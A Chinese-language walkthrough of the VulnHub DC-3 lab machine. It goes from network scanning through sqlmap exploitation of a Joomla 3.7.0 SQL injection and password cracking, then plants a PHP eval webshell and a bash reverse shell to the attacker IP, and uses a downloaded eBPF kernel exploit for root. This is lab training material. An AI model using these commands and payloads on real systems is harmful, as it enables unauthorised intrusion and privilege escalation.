目录

0X00 靶机的环境搭配

0X01 信息收集

一、IP扫描

二、端口扫描

三、网站目录扫描

四、查看网站结构

五、网页信息获取​编辑

0X02 登陆用户

一、账户名破解

1.1 joomla专业工具获取版本

1.2 漏洞利用

1.3 漏洞查询

1.4 sql爆破

1.4-1 爆破所有数据库

1.4-2 爆破所有表

1.4-3 爆破所有字段

1.4-4 爆取指定的字段

二、密码破解

0X03 木马上传

一、一句话木马

二、系统内核版本

0X04 提权

一、提权脚本下载本地​​​​​​​

二、上传提权脚本

三、开始提权

四、提权查看

0X00 靶机的环境搭配

攻击机(KALI):192.168.226.128

靶机(DC-1):  192.168.226.129(未知)

靶机地址:DC: 3.2 ~ VulnHub

0X01 信息收集

一、IP扫描

┌──(root㉿kali)-[~]
└─# arp-scan -l 

arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,并且显示返回的所有响应。
arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。防火墙设备可以屏蔽ping,但是并不能屏蔽ARP数据包。

二、端口扫描

┌──(root㉿kali)-[~]
└─# nmap -T4 -sV -O -A -p- 192.168.226.129
-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(全部端口)

三、网站目录扫描

┌──(root㉿kali)-[~]
└─# dirb http://192.168.238.135

http://192.168.238.135/administrator/

四、查看网站结构

我们看到CMS是joomla,joomla是一种使用PHP语言和MySQL数据库开发的软件系统

三大PHP CMS网站:Drupal、 Wordpress、Joomla

五、网页信息获取

没有ssh服务,但是我们找到了后台登录界面,只能一步步提权

0X02 登陆用户

一、账户名破解

1.1 joomla专业工具获取版本

┌──(root㉿kali)-[~]
└─# sudo

┌──(root㉿kali)-[~]
└─# joomscan --url http://192.168.226.129

通过Wappalyzer火狐插件发现了目标网页CMS为 Joomla,使用专门扫它的工具joomscan 来扫描joomla
kali里面安装joomscan工具的命令是sudo apt-get install joomscan

扫描到目标网页 joomla版本为 3.7.0

1.2 漏洞利用

使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞

┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0    #确认版本为sql注入漏洞

1.3 漏洞查询

┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

1.4 sql爆破

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]   #爆破所有数据库

#-D "joomladb" --tables   指定数据库joomladb爆破所有表

#-D "joomladb" -T "#__users" --columns 指定joomladb数据库中user表爆破所有字段

#-D "joomladb" -T "#__users" -C id,nmae,password,username   爆取指定的字段

1.4-1 爆破所有数据库

1.4-2 爆破所有表

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.238.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

#   -D "joomladb" --tables 指定数据库joomladb爆破所有表   我们找到了用户表

1.4-3 爆破所有字段

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.238.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

#-D "joomladb" -T "#__users" --columns 指定joomladb数据库中user表爆破所有字段

1.4-4 爆取指定的字段

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.238.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]

# -D "joomladb" -T "#__users" -C id,nmae,password,username   爆取指定的字段

我们找到了用户名和密码,但是密码加密了

二、密码破解

┌──(root㉿kali)-[~]
└─# vim mima.txt                        #新建一个文件,将密码密文写入进去,用john破解密码

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

┌──(root㉿kali)-[~]
└─# john mima.txt

http://192.168.226.129/administratorhttp://192.168.226.129/administrator

admin    snoopy  #用获取到的账户密码登陆后台

http://192.168.226.129/templates/beez3/html/ #网站目录

0X03 木马上传

一、一句话木马

在index.php和error.php前面插入php脚本、kali开启监听、再次访问index网页执行脚本

<?php @eval($_POST['pass']);?>     #负责上传病毒文件上去

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.226.128/1212 0>&1' ");
?>    #负责收集Ubuntu16.04信息,启动反弹shell提权

http://192.168.226.129/templates/beez3/error.php   #一句话木马
http://192.168.226.129/templates/beez3/index.php  #访问网站获得反弹shell

在两个连接中分别插入php木马

┌──(root㉿kali)-[~/桌面/靶机/DC-3]
└─# nc -lvp 1212  #kali开启监听端口1212

二、系统内核版本

www-data@DC-3:/var/www/html/templates/beez3$ whoami
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux

www-data@DC-3:/var/www/html/templates/beez3$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS   查看到了版本
Release:        16.04
Codename:       xenial

┌──(root㉿kali)-[~]
└─# searchsploit ubuntu 16.04   

使用searchsploit工具查找Ubuntu 16.04的提权漏洞,发现一个“拒绝服务漏洞”,可以用来提权

cat /etc/issue

0X04 提权

一、提权脚本下载本地

复制漏洞信息到本地,根据提示下载对应脚本上传到服务器

┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/

┌──(root㉿kali)-[~]
└─# cat 39772.txt   #查看漏洞信息

二、上传提权脚本

www-data@DC-3:/var/www/html/templates/beez3$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip 

#根据提示下载攻击载荷,一般国外网站无法下载,可下载好用蚁剑拖进去
www-data@DC-3:/var/www/html/templates/beez3$ unzip 39772.zip  #解压39772.zip文件
www-data@DC-3:/var/www/html/templates/beez3$ cd 39772
www-data@DC-3:/var/www/html/templates/beez3$ tar -xvf exploit.tar  

#解压exploit提权脚本tar包
www-data@DC-3:/var/www/html/templates/beez3$ cd ebpf_mapfd_doubleput_exploit

三、开始提权

<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ls

compile.sh  doubleput.c  hello.c  suidhelper.c

<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh     
<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$  ls

compile.sh  doubleput  doubleput.c  hello.c  suidhelper  suidhelper.c
<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput       #执行提权文件

starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

四、提权查看

whoami
cd /root
ls
cat the-flag.txt

DC-3靶机的渗透学习相关推荐

  1. DC系列漏洞靶场-渗透测试学习复现(DC-1)

    最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...

  2. 【CyberSecurityLearning 74】DC系列之DC-5渗透测试

    目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...

  3. 内网渗透学习-Windows信息收集

    内网渗透学习-Windows信息收集 本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...

  4. 2021年1月4日-Vulnhub-DerpNStink渗透学习

    2021年1月4日-Vulnhub-DerpNStink渗透学习 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali地址:192.168 ...

  5. VulnHub-The Ether: EvilScience (v1.0.1)渗透学习

    VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysy ...

  6. DC系列靶机DC-1

    1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...

  7. Web安全渗透学习-环境搭建

    Web安全渗透-学习笔记-第一阶段 环境准备 OWASP靶机下载 OWASP下载教程 Kali虚拟机安装 虚拟机网络环境设置 虚拟机无法上网的情况 小得 环境准备 首先我只是一名纯小白,特别纯那种,目 ...

  8. web渗透学习路线图

    前言 首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱.衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重 ...

  9. 文件上传漏洞---Web渗透学习

    文件上传本身是一个系统的正常需求,但是由于开发人员在开发时欠缺相关的安全知识,在对用户文件上传部分的控制不足或者缺陷,而导致用户越过其本身权限向服务器上传可执行的动态脚本文件. 这里上传的文件可以是木 ...

最新文章

  1. python基础语言与应用第五章_《Python基础教程》 读书笔记 第五章(下)循环语句...
  2. pve虚拟机导入gho_用vmware安装gho文件心得
  3. 简洁强大的JavaWeb框架Blade
  4. 汇编语言(四)之比较字符串
  5. 三级pc技术_第十九周PC、笔电、数码周边新品汇总:AMD英特尔激战正酣
  6. [渝粤教育] 西北大学 数据结构 参考 资料
  7. oracle 查看监听命令_linux下使用Oracle常用命令
  8. C语言 位段(位域)总结
  9. 【暖*墟】#树链剖分# 树链剖分学习与练习
  10. PYTHON_SPLIT
  11. java中文转英文_eclipse英文转中文怎么设置 eclipse中英文切换图文教程
  12. 【矩阵篇】九宫图/n宫图生成——Merzirac法生成奇阶幻方 Python实现
  13. E. Vowels(SOSdp的简单转化)
  14. 软件测试(二)测试方法测试任务
  15. 【GPU精粹与Shader编程】(七) 一篇文章读完《GPU Gems 3》
  16. java 视频统一转成mp4格式,并且异步多线程上传
  17. Linux7修改网卡为eht0
  18. 纯CSS制作自适应分页条-分享------彭记(019)
  19. 打印机在2k/xp下的自定义纸张设定
  20. 一张图看懂计算机网络——计算机体系结构

热门文章

  1. 代码界的那些神级“教父”,看你认识几个?
  2. windos10+ubuntu16.4安装历程(超级详细,解决识别不出未分配空间等问题)
  3. 计算机网络—网络原理之<TCP/IP 五层协议 >图解+详述
  4. Int8,Int16,Int32,Int64 有啥不同呢?看了立马就懂!
  5. uniapp 安卓多个音频_Win10发布新版,可从PC直接访问安卓手机APP,你会重启升级吗?...
  6. C#制作高仿360安全卫士窗体二
  7. 精通Python——GUI编程学习
  8. 某程序员转行前的感慨 -【告别程序员生涯 】
  9. 【数组】数组方法push
  10. Python课堂练习